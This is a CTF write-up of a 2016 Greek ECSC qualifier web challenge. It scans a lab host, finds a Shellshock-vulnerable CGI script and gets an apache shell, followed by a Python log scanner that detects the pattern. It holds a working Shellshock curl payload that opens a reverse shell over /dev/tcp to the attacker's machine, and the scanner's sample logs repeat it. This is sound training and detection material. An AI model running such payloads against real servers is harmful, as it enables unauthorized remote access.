Category: Web security

You can download the Web Security challenge, along with all the challenges of the 2016 Greek Qualifier CTF of the European Cybersecurity Challenge, at this link. More details on the Greek ECSC 2016 Qualifier CTF event can be found here.

Points: 60

Challenge designer: nasosnik

Description:

> Obtain a command shell on the remote host as apache user.

Write-up

First we scan the host and discover two HTTP services running on ports 80 and 8801.

root@kali:~# nmap -sT -Pn 192.168.200.211 -p1-65535

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-07-09 10:42 EEST
Nmap scan report for 192.168.200.211
Host is up (0.0017s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
8801/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 3.78 seconds

On port 80 there was a WordPress blog. However, after some experimentation it didn't seem to be our entry point, so we switched our attention to port 8801. A directory scan of /cgi-bin/ turned up an accessible CGI script (/cgi-bin/debug).

root@kali:~# dirb http://192.168.200.211:8801/cgi-bin/ -r -f -N 404

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Aug 30 08:13:58 2016
URL_BASE: http://192.168.200.211:8801/cgi-bin/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Ignoring NOT_FOUND code -> 404
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.200.211:8801/cgi-bin/ ----
+ http://192.168.200.211:8801/cgi-bin/debug (CODE:200|SIZE:45)

-----------------
END_TIME: Tue Aug 30 08:14:01 2016
DOWNLOADED: 4612 - FOUND: 1

The target server was found vulnerable to Shellshock, a well-known bash bug publicly disclosed in 2014: the CGI handler exports request headers such as User-Agent as environment variables, and a vulnerable bash executes the commands that follow a crafted function definition in such a variable. We exploited Shellshock to get a reverse shell through bash's /dev/tcp pseudo-device, since nc was missing from the target system.

root@kali:~# curl http://192.168.200.211:8801/cgi-bin/debug -H 'User-Agent: () { :;}; /bin/sh -i >& /dev/tcp/192.168.200.9/33444 0>&1'
root@kali:~# nc -nvvlp 33444
Listening on [0.0.0.0] (family 0, port 33444)
Connection from [192.168.200.211] port 33444 [tcp/*] accepted (family 2, sport 39126)
sh: no job control in this shell
sh-4.1$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-4.1$ cat flag.txt
flag{You_Win_th1s_Time}

The flag is:

> flag{You_Win_th1s_Time}
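The request used above leaves a trace in the web server's access log. As an added example that is not part of the original write-up, here is a small Python scanner that flags the Shellshock function-definition pattern in the fields an Apache combined-format log records; the log lines are constructed for illustration, not taken from the challenge host.

```python
import re
from dataclasses import dataclass

# Apache "combined" log format:
# ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock trigger: an exported bash function definition "() {" at the
# start of a value. Whitespace between the tokens is optional, so match loosely.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

@dataclass
class Finding:
    ip: str
    time: str
    field: str   # which logged field carried the pattern
    value: str

def scan_line(line):
    """Return a Finding if a logged field contains the Shellshock pattern."""
    m = LOG_RE.match(line.rstrip('\n'))
    if not m:
        return None  # malformed line or a different log format: skip it
    for field in ('request', 'referer', 'agent'):
        if SHELLSHOCK_RE.search(m.group(field)):
            return Finding(m.group('ip'), m.group('time'), field, m.group(field))
    return None

def scan_log(lines):
    """Scan an iterable of log lines and collect all findings."""
    return [f for f in (scan_line(l) for l in lines) if f]

# Constructed sample log lines (not from the challenge host).
SAMPLE_LOG = [
    '192.168.200.9 - - [30/Aug/2016:08:13:58 +0300] "GET /cgi-bin/debug HTTP/1.1" 200 45 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.200.9 - - [30/Aug/2016:08:20:11 +0300] "GET /cgi-bin/debug HTTP/1.1" 200 45 "-" "() { :;}; /bin/sh -i >& /dev/tcp/192.168.200.9/33444 0>&1"',
    '10.0.0.7 - - [30/Aug/2016:08:21:02 +0300] "GET /index.html HTTP/1.1" 200 1024 "() { :; }; echo probe" "curl/7.47.0"',
]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.time} {f.ip} shellshock pattern in {f.field}: {f.value!r}")
```

The combined format only records the Referer and User-Agent headers, while a CGI handler exports every request header into the environment, so a payload in any other header would not show up here; a custom LogFormat or a WAF in front of the CGI endpoint is needed for full coverage.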

# echo 7eamnull
